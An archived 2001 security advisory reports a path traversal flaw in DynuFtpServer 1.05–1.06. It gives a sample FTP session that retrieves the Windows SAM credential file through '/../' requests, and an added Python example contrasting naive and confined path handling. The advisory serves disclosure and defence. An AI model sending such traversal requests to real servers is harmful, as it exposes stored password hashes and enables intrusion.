[NT] DynuFtpServer Security Vulnerabilities

From: support@securiteam.com
Date: 09/02/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] DynuFtpServer Security Vulnerabilities
Message-Id: <20010902204248.A0960138C0@mail.der-keiler.de>
Date: Sun,  2 Sep 2001 22:42:48 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  DynuFtpServer Security Vulnerabilities
------------------------------------------------------------------------

SUMMARY

 <http://www.dynu.com/dynuftpserver.asp> Dynu FTP Server is a
multithreaded FTP server implementing the RFC 959 protocol. Its features
include support for multi-homed servers, user access management, an active
log and more. A security vulnerability in the product allows clients to
download files that reside outside the FTP root directory that is supposed
to bound all access.

DETAILS

Vulnerable systems:
DynuFtpServer version 1.06
DynuFtpServer version 1.05

Immune systems:
DynuFtpServer version 1.07

The security problem occurs when a relative path containing ".." is supplied
to the GET command (RETR, retrieve files) or the SIZE command: the server does
not confine the resolved path to the FTP root directory.

Sample session:
331 Anonymous access allowed, send identity (e-mail name) as password.
Kennwort:
230 Anonymous user logged in.
ftp> quote size /../winnt/repair/sam
213 20480
ftp> get /../winnt/repair/sam c:\sec\sam
200 PORT command successful.
150 Opening ASCII mode data connection for /../winnt/repair/sam.
226 Transfer complete.

Solution:
Upgrade to version 1.07, the latest release.
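To show the root cause behind the sample session, here is an added Python example (not DynuFtpServer code, and not a description of how version 1.07 fixes the issue): a naive root-plus-request path mapping beside a segment-walking check that refuses any RETR/SIZE argument whose ".." would climb above the FTP root. The FTP_ROOT value and the rule rejecting ":" in a segment are assumptions made for the example.

```python
import ntpath
import posixpath
from typing import List, Optional

# Constructed example: the directory the administrator intends to be the FTP root.
FTP_ROOT = r"C:\ftproot"


def naive_local_path(ftp_root: str, requested: str) -> str:
    """Weak pattern: glue the client-supplied path onto the root and let the
    OS path routines resolve '..'. A request for /../winnt/repair/sam becomes
    C:\\ftproot\\..\\winnt\\repair\\sam, which normalises to C:\\winnt\\repair\\sam."""
    relative = requested.replace("/", "\\").lstrip("\\")
    return ntpath.normpath(ntpath.join(ftp_root, relative))


def confined_local_path(ftp_root: str, cwd: str, requested: str) -> Optional[str]:
    """Hardened pattern: walk the virtual path segment by segment and refuse any
    request in which '..' would climb above the FTP root.

    cwd is the client's current virtual directory ('/' is the root); requested
    is the RETR/SIZE argument, absolute or relative, with either slash style.
    Returns the local path, or None when the request must be rejected."""
    virtual = requested.replace("\\", "/")
    if not virtual.startswith("/"):
        virtual = posixpath.join(cwd, virtual)
    stack: List[str] = []
    for segment in virtual.split("/"):
        if segment in ("", "."):
            continue                      # empty or current-dir segment: no effect
        if segment == "..":
            if not stack:
                return None               # would escape the root: reject
            stack.pop()
        elif ":" in segment:
            return None                   # drive letter or NTFS stream syntax (assumed rule): reject
        else:
            stack.append(segment)
    return ntpath.join(ftp_root, *stack)  # empty stack maps to the root itself
```

The naive mapping returns C:\winnt\repair\sam for the advisory's request, while the confined mapping rejects it and still accepts ".." that stays below the root.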

ADDITIONAL INFORMATION

The information has been provided by
<mailto:Christoph.Heindl@fhs-hagenberg.ac.at> Christoph Heindl.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
